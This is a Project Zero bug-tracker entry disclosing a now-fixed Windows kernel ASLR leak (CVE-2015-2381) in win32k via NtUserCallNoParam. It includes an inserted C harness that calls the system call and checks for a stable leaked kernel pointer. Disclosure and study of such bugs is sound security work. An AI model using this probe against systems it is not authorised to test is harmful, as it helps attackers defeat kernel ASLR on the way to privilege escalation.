Starred by 3 users
Status: Fixed
Closed: Aug 2015
Kernel ASLR leak in win32k!zzzHideCursorNoCapture (via NtUserCallNoParam)
Reported by matttait@google.com, May 18 2015
When calling the Win32k system call win32k!zzzHideCursorNoCapture (via NtUserCallNoParam), the return value of the function leaks a kernel-mode address to user-mode.

This function returns type void, and so RAX - which holds the kernel-mode address of a PCURSOR object in kernel memory - is inappropriately returned to usermode.

This vulnerability gives local attackers the ability to de-ASLR the kernel from any permission level, and could be used to stabilize a local kernel-mode read/write vulnerability as part of a kernel-mode exploit.

Labels:
Vendor-Microsoft
Product-Windows-Kernel
Severity-Medium
PublicOn-? (e.g. PublicOn-2014-Jul-26)
Finder-MattTait
Reported-2015-May-19

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
 
Attachment: KASLRLeak-Release.c (1.8 KB)
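The following harness is an added example for the leak described in the report above; it is not the attached KASLRLeak-Release.c and not code from the reporter or from Microsoft. NtUserCallNoParam takes a single argument, the index of the win32k routine it dispatches to. The index that reaches zzzHideCursorNoCapture is not stated on this page and differs between builds, so the harness takes it from the command line (assumption: you recovered it from a disassembly of win32k!NtUserCallNoParam on the build under test). The system call is reached through the NtUserCallNoParam export of win32u.dll, which exists on Windows 10 and later; on the 2015-era builds the report targets you would need a raw syscall stub instead, which is not shown. The classifier that decides whether a raw return value is a kernel-mode pointer is platform-independent and runs on any host with constructed sample values.

```c
/*
 * Added example (not the report's attached PoC). Calls NtUserCallNoParam
 * twice with a caller-supplied routine index and checks whether the raw
 * return value is a kernel-mode pointer that is stable across calls, which
 * is what makes a void-function RAX leak usable for defeating kernel ASLR.
 * Assumptions: routine index supplied by the user; win32u.dll export
 * (Windows 10+); sample values on non-Windows hosts are constructed.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Does a raw return value look like a kernel-mode pointer?
 * x64: kernel space is the high half of the canonical address space, so
 * bit 63 is set. A 32-bit NTSTATUS or BOOL written to EAX is zero-extended
 * into RAX, so a value with bit 63 set cannot be an ordinary 32-bit status
 * code: the check is unambiguous on x64.
 * x86: kernel space starts at 0x80000000 (without /3GB), but a failing
 * NTSTATUS such as 0xC0000005 also has the high bit set, so a single
 * 32-bit value is ambiguous and must be confirmed by a second call. */
int looks_like_kernel_pointer(uint64_t value, int pointer_bits)
{
    if (pointer_bits == 64)
        return (value >> 63) != 0;
    if (pointer_bits == 32)
        return value <= 0xFFFFFFFFull && value >= 0x80000000ull;
    return 0;
}

/* A leak is useful for exploitation only if repeated calls return the same
 * object address: a stable value can be reused to derive other addresses,
 * a changing one is noise or a freshly allocated object each time. */
int leak_is_stable(uint64_t first, uint64_t second, int pointer_bits)
{
    return first == second && looks_like_kernel_pointer(first, pointer_bits);
}

#ifdef _WIN32
#include <windows.h>

typedef ULONG_PTR (NTAPI *NtUserCallNoParam_t)(ULONG routine_index);

/* Invoke NtUserCallNoParam twice with the given dispatch index and return
 * the two raw values; returns 0 if the export cannot be resolved. */
static int call_no_param_twice(ULONG index, uint64_t *out1, uint64_t *out2)
{
    /* Loading user32.dll first makes this a GUI process, so win32k system
     * calls are serviced instead of being rejected for a non-GUI thread. */
    LoadLibraryA("user32.dll");
    HMODULE win32u = LoadLibraryA("win32u.dll");
    if (!win32u)
        return 0;
    NtUserCallNoParam_t fn =
        (NtUserCallNoParam_t)GetProcAddress(win32u, "NtUserCallNoParam");
    if (!fn)
        return 0;
    *out1 = (uint64_t)fn(index);
    *out2 = (uint64_t)fn(index);
    return 1;
}
#endif

int main(int argc, char **argv)
{
    int bits = (int)(sizeof(void *) * 8);
    uint64_t v1, v2;
#ifdef _WIN32
    if (argc < 2) {
        fprintf(stderr, "usage: %s <NtUserCallNoParam routine index>\n", argv[0]);
        return 2;
    }
    if (!call_no_param_twice((ULONG)strtoul(argv[1], NULL, 0), &v1, &v2)) {
        fprintf(stderr, "could not resolve win32u!NtUserCallNoParam\n");
        return 2;
    }
#else
    /* Constructed sample values for non-Windows hosts, shaped like an x64
     * win32k session-space object address returned on two consecutive
     * calls. Not captured from a real system. */
    (void)argc; (void)argv;
    bits = 64;
    v1 = 0xFFFFF90140A1B2C0ull;
    v2 = 0xFFFFF90140A1B2C0ull;
#endif
    printf("call 1: 0x%llx  call 2: 0x%llx\n",
           (unsigned long long)v1, (unsigned long long)v2);
    if (leak_is_stable(v1, v2, bits))
        printf("kernel-mode pointer leaked to user mode (stable across calls)\n");
    else if (looks_like_kernel_pointer(v1, bits))
        printf("kernel-looking value but not stable; confirm before relying on it\n");
    else
        printf("no kernel pointer in return value (patched, wrong index, or non-pointer return)\n");
    return 0;
}
```

On a patched system, or with an index that reaches a routine that really returns a status, the x64 value has its upper 32 bits clear and the classifier reports no leak; the two-call comparison is what separates a reusable object address from a transient one.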
Comment 1 by matttait@google.com, Jun 16 2015
Summary: Kernel ASLR leak in win32k!zzzHideCursorNoCapture (via NtUserCallNoParam) (was: Kernel ASLR leak in NtUserNoParam)
Assigned MSRC case number MS-30380
Comment 2 by matttait@google.com, Jul 10 2015
Assigned MSRC case 30380

Fixed in July 2015 Patch Tuesday
Project Member Comment 3 by hawkes@google.com, Aug 12 2015
Labels: -Restrict-View-Commit
Status: Fixed
Project Member Comment 4 by mjurczyk@google.com, Aug 12 2015
Labels: MSRC-30380 CVE-2015-2381 Fixed-14-Jul-2015
Project Member Comment 5 by mjurczyk@google.com, Aug 12 2015
Labels: -Fixed-14-Jul-2015 Fixed-2015-Jul-14